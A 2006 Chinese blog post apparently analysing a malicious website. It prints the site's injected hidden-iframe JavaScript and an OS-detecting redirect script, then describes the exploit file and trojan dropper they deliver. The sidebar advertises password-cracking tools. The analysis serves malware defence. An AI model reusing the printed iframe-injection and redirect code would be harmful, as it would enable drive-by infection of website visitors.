关于hxxp://www.hj234.com的问题

最新推荐文章于 2022-01-05 15:51:49 发布
最新推荐文章于 2022-01-05 15:51:49 发布
阅读量1w 收藏
点赞数
分类专栏: 原创作品 系统安全 系统维护 文章标签: javascript windows ie iframe vb c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Purpleendurer/article/details/675821
版权

endurer 原创

2006-04-24 第1

在hxxp://www.hj234.com的主页有代码:

 

 

<script language=JavaScript src="hxxp://www.***hj234.com/abc/abc.js"></script>

 

 

hxxp://www.***hj234.com/abc/abc.js的内容为:

 


document.write("<iframe height=0 width=0 frameborder=0 src='hxxp://www.***hj234.com/abc/joke.htm'></iframe>")

 

 

 

hxxp://www.***hj234.com/abc/joke.htm的内容为:

 


 <center><font color=red>对不起,您访问的页面不存在!</font><center>                             <script language=javascript>ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';</script>

 

 

 

会根据浏览者所用Windows版本,打开windows.htm,winnt.htm或w98.htm

从这个网页开始,所用的技术与发现一个使用技术升级、下载灰鸽子的网站相同。

这3个网页会下载/运行文件young.gifyoung.css

young.gif 是个利用系统漏洞的网页文件,访问注册表获取IE临时文件夹路径,并利用WScript.Shell复制文件young.css,创建文件c:/wins.bat,c:/boot.hta,C:/wins.exe。
江民KV2006报为Exploit.VBS.Phel.ba

young.css 用VB6编写,修改IE启动页,创建名为services.exe的文件,并在注册表的run键加入开机启动项,江民KV2006报为TrojanDropper.Delf.d

紫郢剑侠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
cl.yaocl.me index.php,www.aipapapagif.com
weixin_42451850的博客
03-11 1万+
Domain Name: AIPAPAPAGIF.COMRegistry Domain ID: 2011240872_DOMAIN_COM-VRSNRegistrar WHOIS Server: whois.name.comRegistrar URL: http://www.name.comUpdated Date: 2016-03-11T05:45:11ZCreation Date: 2016-...
不怕死就上这些网站
临时工 Temporary's Space
08-14 11万+
 1. hxxp:///www.dj3344.com 打开后,重启时你的主页就变成它的,并通过QQ向他人传播,现在正飙行,奇坏无比!2. hxxp:///www.qq168.net 打开后,重启时你的主页就变成它的,并通过QQ向他人传播,而且传波病毒,还狠些!现在正在飙行!3. hxxp:///www.777888.com  4. hxxp:///WWW.5dsoft.com  5. hx
http://www.soier.net/?45986.htm
wy1294641337的专栏
10-24 2万+
<br />http://www.soier.net/?45986.htm
docker
cc_lllL的博客
01-05 3740
docker的原理,操作,流程。来自狂神说的视频,自己边看边做的笔记。
hxxp://www.hao923.com.cn/劫持浏览器
Purpleendurer@CSDN
10-08 1万+
  一位网友在国庆那天,为了在网上看阅兵式,从网上下载安装了一个软件,不料IE主页被劫持为hxxp://www.hao923.com.cn/,用超级巡警无法修复,请偶帮忙检修。  右击网友电脑桌面上的IE图标,发现弹出的是网址快捷方式的快捷菜单,看来那个软件把桌面原有的IE图标换成了指向的hxxp://www.hao923.com.cn/的快捷方式,开始菜单中的Internet Explore
压缩包密码破解及各类文档密码破解软件.rar
06-23
该资源包含多种密码破解软件,rar文件、zip文件、pdf文件、word文件、ppt文件、excel文件等,有需要的用户可以下载使用。
某养生健康网站源码 v1.0
10-24
收集自网络。亲测完整无错。...-->完成后进入后台后台是/admin 2. 然后点系统--数据库备份/还原--还原数据 -->还原完成后 -->...)3....) 4....附:根据二00二年一月一日《计算机软件保护条例》规定:为了学习和研究...
argon24MB密码破解字典
04-06
该字典为argon24mb文件,用于arpr软件破解解压密码使用,整整 22349627 行短语/字串
zip password Recovery
10-18
破解 zip 加密文档 支持字典模式 自定义 字典
hao234网址导航
04-29
hao234 网址导航 完整源码,上传到asp空间即可使用。 hao234网址导航 官方网址 www.hao234.com.cn 还望使用了的朋友为本站做个连接, 宣传一下。本站将不定期系统更新。
黄色——网页效果图设计之色彩索引
php菜鸟技术天地
06-02 3万+
是人眼睛最容易注意到的色彩;比纯白色的亮度还要高;可以促进新陈代谢;明亮的黄色是所有色彩中最容易让人产生疲劳感的颜色,它很刺激人的眼睛;暗淡的黄色可以加强人们的注意力,所以多应用于提示牌,如图3-33所示。 图3-33 黄色 3.4.3.1 黄色的具象联想 阳光、沙滩、蛋黄、香蕉、向日葵、小鸡、面包、菜花。 3.4.3.2 黄色的正面联想 聪明、才智、乐观、光辉、喜悦、平凡、泼辣、明快、希望、光
3D网站
Yuan的专栏
07-06 1万+
首先将wlong3d上的相关资源搬了过来……:)以后大家有什么站点推荐可以放在这里:)http://www.3dcafe.com/ ;;http://www.raph.com/ ;;http://www.meta3d.com/ ;;http://www.highend3d.com/ ;;http://members.xoom.com/maxfuel ;;http://www.3d-domain.c
域名与转发服务器ip指向不一致_新手引导:教你如何解析域名?
weixin_39529302的博客
11-29 7825
公司在做网站时,在购买了域名、主机空间以及做好了网站源代码和数据库之后,如果网站在备案中或者网站备案通过了,就可以做域名解析,如果解析设置没有问题,10分钟之后就可正常打开了。但是,在域名解析的过程中,经常会有用户问怎么解析?如何选择域名A记录和CNAME记录?本着普及基础知识、引导初学者快速上手的目的,我们建议大家花5分钟时间来学习和了解域名解析的相关知识,并且希望看到此文的初学者能够加深理解。...
[07-19] 解决灰鸽子新变种、Rootkit.Vanti.gen等及www.58111.com劫持(第5版)
Purpleendurer@CSDN
07-12 7277
endurer 原创2006-07-19 第5版 补充杀毒软件的反应。2006-07-17 第4版 补充杀毒软件的反应。2006-07-14 第3版 补充杀毒软件的反应。2006-07-13 第2版 补充杀毒软件的反应,在该网友电脑的其它盘发现的恶意程序。2006-07-12 第1版  昨天有网友说他的电脑中的瑞星每次开机自动扫描总是报告发现灰鸽子,实时监控总发现并成功删除Rootkit.
WWW
alley6980的博客
11-11 580
IEnumerator Start () { string str = "file://" + Application.streamingAssetsPath+ "/a.txt"; WWW www = new WWW(str); yield return www; if (www.isDone) { ...
uc.php接口调试,ucenter整合对接自己的系统的方法及Authracation has expiried原因
09-10 8341
特别注意,整合前,一定要进dz论坛的后台-----站长----ucenter设置,把免激活设置下,否则,你在测试向论坛同步注册并登录时,可能会一直登录不成功.又找不到原因. 一,关于从论坛向你的网站中同步. 我们的系统,比如织梦系统,如果要接收来自论坛等其它系统发来的会员信息,并同步登录或注册,就需要我们的系统中有一个接口,  这个接口就是本系统根目录中的api/uc.php,他是ucent...
利用 pdf.js 实现在前端预览 .pdf 文件
热门推荐
qq_35420936的博客
10-14 12万+
目录 1. 下载地址: 2. 任务描述: 3. 测试流程: 4. 代码内容: 1)pdf 转成 base64 编码方法,filePath 指定文件路径 2)base64 编码转成 pdf 方法 3)前端 HTML 文件,利用 iframe ,指定 src 的路径 4)Js文件,这边可能需要根据自身的实际情况改动 5. 效果图: 6. 缺陷: 注:有些注释可能不够权威,大家发现...
hxxp://www.54kk.com
最新发布
01-30
根据提供的引用内容,hxxp://www.54kk.com 是一个网址。...如果你想了解更多关于hxxp://www.54kk.com的信息,我建议你使用安全的网络浏览器打开该网址,并确保你的计算机有最新的防病毒软件和防火墙保护。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值